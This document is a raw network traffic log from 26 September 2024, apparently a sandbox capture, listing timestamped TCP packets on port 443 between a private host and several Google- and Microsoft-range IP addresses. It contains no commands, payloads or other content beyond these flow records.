Sep 26, 2024 17:55:25.753238916 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.753272057 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.753298044 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.753309011 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.753345013 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.755110979 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755183935 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755233049 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.755253077 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755372047 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755418062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755419970 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.755431890 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.755471945 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.764229059 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764545918 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764586926 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764604092 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.764630079 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764669895 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.764671087 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764684916 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.764739037 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.765001059 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.765069008 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.765109062 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.765124083 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.765544891 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.765594006 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.765604973 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767368078 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767417908 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767426014 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.767446995 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767482042 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.767491102 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767914057 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.767957926 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.767965078 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771025896 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771064997 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771070957 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.771078110 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771155119 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.771173000 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771404982 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.771449089 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.771456003 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.772583008 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.772623062 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.772639036 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.772655010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.772701025 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.772716045 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.772965908 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.773010015 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.773020029 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774091959 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774142027 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774169922 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.774183035 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774219990 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.774226904 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774282932 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.774317026 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.774323940 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785214901 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785264015 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785278082 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.785300970 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785339117 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.785445929 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785731077 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.785773039 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.785778999 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.802829027 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.802887917 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.802912951 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.803162098 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.803200006 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.803209066 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.803219080 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.803261995 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.803268909 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805748940 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805800915 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.805808067 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805867910 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805907965 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.805912018 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805923939 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.805964947 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.812838078 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.812911034 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.812954903 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.812979937 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.813064098 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.813098907 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.813102007 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.813111067 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.813155890 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.815247059 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815351963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815412998 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815416098 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.815431118 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815479040 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.815479040 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815491915 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.815536976 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.822139025 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.822316885 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.822362900 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.822365046 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.822386980 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.822421074 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.822428942 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832602024 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832649946 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832657099 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.832681894 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832721949 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.832730055 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832828999 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.832868099 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.832875967 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.837143898 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.837373018 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.837392092 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.838310957 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.838387966 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.838713884 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.838767052 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.838855982 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.838862896 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.840612888 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.840646029 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.840665102 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.840692043 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.840733051 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.840747118 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.840814114 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.840862036 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.840869904 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.843982935 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.844016075 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.844042063 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.844068050 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.844105959 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.844124079 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.844132900 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.844172955 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.844180107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846036911 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846079111 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846096992 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.846117973 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846198082 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.846204996 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846436977 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846472979 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846502066 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.846512079 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.846544027 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.855272055 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855516911 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855552912 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855561972 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.855583906 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855652094 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.855806112 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855892897 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855922937 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855931997 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.855942011 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.855978012 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.856353045 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.856583118 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.856707096 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.856715918 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858217001 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858277082 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.858292103 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858447075 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858485937 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858503103 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.858510017 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.858540058 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.858546972 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862443924 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862476110 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862524033 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.862539053 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862576962 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.862641096 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862859964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.862895966 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.862905025 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863646030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863701105 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.863711119 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863830090 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863864899 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863878965 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.863888025 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.863924980 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.864124060 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.864609003 CEST	443	49720	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.864675999 CEST	443	49720	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.864727974 CEST	49720	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.865015030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865063906 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.865076065 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865243912 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865281105 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865283012 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.865293980 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865331888 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.865351915 CEST	49720	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.865367889 CEST	443	49720	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.865511894 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.869448900 CEST	49724	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.869472027 CEST	443	49724	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.869545937 CEST	49724	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.869853973 CEST	49724	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.869863033 CEST	443	49724	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:25.876606941 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.876636982 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.876665115 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.876692057 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.876746893 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.876813889 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.876957893 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.876995087 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.877007008 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.882194996 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:25.894028902 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.894068956 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.894083977 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.894109964 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.894155025 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.894164085 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.894383907 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.894429922 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.894440889 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896568060 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896610975 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896642923 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896671057 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.896687984 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896723986 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896747112 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.896754980 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.896852970 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.896985054 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.897039890 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.897042990 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.897068024 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.897111893 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.897119045 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.897384882 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.897424936 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.897432089 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.898292065 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.902471066 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.902548075 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.902569056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.903906107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.903979063 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.904006004 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.904146910 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.904184103 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.904196024 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.904207945 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.904238939 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.904246092 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906383038 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906450987 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.906469107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906680107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906718969 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906728029 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.906740904 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.906800032 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.906806946 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.908878088 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.908962965 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.908993959 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914159060 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914218903 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.914237976 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914328098 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914367914 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914375067 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.914385080 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.914417028 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.914589882 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.917862892 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.918073893 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.918083906 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.926415920 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.926507950 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.926532030 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.926903963 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.926935911 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.926961899 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.926970959 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.927023888 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.929198027 CEST	49673	443	192.168.2.16	204.79.197.203
Sep 26, 2024 17:55:25.942142010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.942353010 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.942394018 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.942429066 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.942439079 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.942452908 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.942481041 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.945058107 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945103884 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945122004 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.945139885 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945197105 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.945391893 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945465088 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945508003 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945509911 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.945519924 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945564032 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.945796967 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.945991993 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.946057081 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.946067095 CEST	49715	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:25.946074009 CEST	443	49715	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:25.946113110 CEST	49715	443	192.168.2.16	172.217.16.132
